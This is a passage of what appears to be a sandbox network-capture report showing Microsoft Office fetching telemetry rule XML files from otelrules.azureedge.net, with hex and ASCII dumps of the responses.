R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0

Session ID	Source IP	Source Port	Destination IP	Destination Port
44	192.168.2.4	49802	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:15 UTC	192	OUT	GET /rules/rule120641v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:15 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:15 GMT Content-Type: text/xml Content-Length: 404 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT ETag: "0x8DC582B95C61A3C" x-ms-request-id: d277967d-801e-0047-0163-3b7265000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193615Z-178bfbc474bscnbchC1NYCe7eg00000003n0000000005329 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:15 UTC	404	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S

Session ID	Source IP	Source Port	Destination IP	Destination Port
45	192.168.2.4	49801	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:15 UTC	192	OUT	GET /rules/rule120640v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:15 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:15 GMT Content-Type: text/xml Content-Length: 478 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT ETag: "0x8DC582B9B233827" x-ms-request-id: 4b4d3db7-601e-003d-0147-3c6f25000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193615Z-178bfbc474bh5zbqhC1NYCkdug000000036g00000000y26g x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:15 UTC	478	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
46	192.168.2.4	49803	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:15 UTC	192	OUT	GET /rules/rule120642v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:15 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:15 GMT Content-Type: text/xml Content-Length: 468 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT ETag: "0x8DC582BB046B576" x-ms-request-id: 20e2cd06-701e-005c-2869-3bbb94000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193615Z-178bfbc474b9xljthC1NYCtw9400000003c0000000007199 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:15 UTC	468	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
47	192.168.2.4	49804	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:15 UTC	192	OUT	GET /rules/rule120643v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:16 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:15 GMT Content-Type: text/xml Content-Length: 400 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT ETag: "0x8DC582BB2D62837" x-ms-request-id: 792329fd-401e-0035-1f6c-3b82d8000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193615Z-178bfbc474bfw4gbhC1NYCunf400000003ag00000000u405 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:16 UTC	400	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="

Session ID	Source IP	Source Port	Destination IP	Destination Port
48	192.168.2.4	49805	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:15 UTC	192	OUT	GET /rules/rule120644v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:16 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:16 GMT Content-Type: text/xml Content-Length: 479 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT ETag: "0x8DC582BB7D702D0" x-ms-request-id: a1d815ed-301e-0096-3f8c-3ae71d000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193616Z-174c587ffdfks6tlhC1TEBeza400000001wg00000000kcyz x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:16 UTC	479	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
49	192.168.2.4	49807	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:17 UTC	192	OUT	GET /rules/rule120646v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:18 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:17 GMT Content-Type: text/xml Content-Length: 475 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT ETag: "0x8DC582BB2BE84FD" x-ms-request-id: eb55dd92-f01e-0020-3d6a-3c956b000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193617Z-174c587ffdf8fcgwhC1TEBnn7000000001yg00000000r6cw x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:18 UTC	475	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
50	192.168.2.4	49806	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:17 UTC	192	OUT	GET /rules/rule120645v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:18 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:18 GMT Content-Type: text/xml Content-Length: 425 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT ETag: "0x8DC582BBA25094F" x-ms-request-id: 62f36519-501e-0016-468c-3a181b000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193618Z-174c587ffdfb74xqhC1TEBhabc00000001w000000000cy5a x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:18 UTC	425	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=

Session ID	Source IP	Source Port	Destination IP	Destination Port
51	192.168.2.4	49809	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:17 UTC	192	OUT	GET /rules/rule120648v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:18 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:18 GMT Content-Type: text/xml Content-Length: 491 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B98B88612" x-ms-request-id: af6ae163-c01e-0082-6735-3caf72000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193618Z-178bfbc474b9fdhphC1NYCac0n000000036g00000000xg6p x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:18 UTC	491	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
52	192.168.2.4	49808	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:17 UTC	192	OUT	GET /rules/rule120647v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:18 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:18 GMT Content-Type: text/xml Content-Length: 448 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT ETag: "0x8DC582BB389F49B" x-ms-request-id: 2250be27-501e-007b-7961-3b5ba2000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193618Z-178bfbc474brk967hC1NYCfu60000000039g000000002rda x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:18 UTC	448	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>

Session ID	Source IP	Source Port	Destination IP	Destination Port
53	192.168.2.4	49810	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:18 UTC	192	OUT	GET /rules/rule120649v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:18 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:18 GMT Content-Type: text/xml Content-Length: 416 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT ETag: "0x8DC582BAEA4B445" x-ms-request-id: f9d2b1a4-b01e-003d-337e-3bd32c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193618Z-174c587ffdftv9hphC1TEBm29w00000001wg0000000028m6 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:18 UTC	416	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.4	49814	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:20 UTC	192	OUT	GET /rules/rule120653v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:20 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:20 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT ETag: "0x8DC582B9C710B28" x-ms-request-id: c2dc1527-b01e-0053-5db2-3bcdf8000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193620Z-174c587ffdfmrvb9hC1TEBtn3800000001u000000000pd5m x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:20 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
55	192.168.2.4	49811	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:20 UTC	192	OUT	GET /rules/rule120650v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:20 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:20 GMT Content-Type: text/xml Content-Length: 479 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B989EE75B" x-ms-request-id: f47ed088-401e-0029-7f4d-3c9b43000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193620Z-15b8b599d88m7pn7hC1TEB4axw00000001x000000000cstb x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:20 UTC	479	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 